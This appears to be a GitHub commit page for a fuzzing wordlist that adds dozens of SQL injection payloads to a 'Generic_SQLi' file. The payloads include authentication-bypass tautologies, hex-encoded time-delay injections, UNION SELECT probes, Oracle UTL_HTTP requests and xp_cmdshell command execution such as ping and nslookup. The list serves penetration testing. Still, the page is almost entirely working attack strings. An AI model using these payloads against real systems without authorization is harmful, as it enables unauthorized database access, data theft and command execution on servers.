Skip to content

Commit

Permalink
Update Generic_SQLi
Browse files Browse the repository at this point in the history
  • Loading branch information
jhaddix committed Jul 23, 2014
1 parent 13e3bbb commit 2eaeada
Showing 1 changed file with 54 additions and 3 deletions.
57 changes: 54 additions & 3 deletions Fuzzing/Generic_SQLi
Original file line number Diff line number Diff line change
Expand Up @@ -49,7 +49,6 @@ a' waitfor delay '0:0:10'--
1;(load_file(char(47,101,116,99,47,112,97,115, ...
or%201=1
1 or sleep(__TIME__)#
));waitfor delay '0:0:__TIME__'--
or 1=1
and 1 in (select var from temp)--
or '7659'='7659
Expand Down Expand Up @@ -186,11 +185,9 @@ or 0=0 #
hi or a=a
*(|(mail=*))
password:*/=1--
or 1=1--
distinct
);waitfor delay '0:0:__TIME__'--
to_timestamp_tz
;waitfor delay '0:0:__TIME__'--
") or benchmark(10000000,MD5(1))#
UNION SELECT
%2A%28%7C%28mail%3D%2A%29%29
Expand All @@ -214,3 +211,57 @@ x' or 1=1 or 'x'='y
?
or 1/*
!
'
or a = a
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
' or 1=1
 or 1=1 --
x' OR full_name LIKE '%Bob%
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'%20or%20''='
'%20or%20'x'='x
')%20or%20('x'='x
' or 0=0 --
' or 0=0 #
or 0=0 #"
' or 1=1--
' or '1'='1'--
' or 1 --'
or 1=1--
' or 1=1 or ''='
or 1=1 or ""=
' or a=a--
or a=a
') or ('a'='a
'hi' or 'x'='x';
or
procedure
handler
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
<>"'%;)(&+
'%20or%201=1
'sqlattempt1
%28
%29
%26
%21
' or ''='
' or 3=3
 or 3=3 --

0 comments on commit 2eaeada

Please sign in to comment.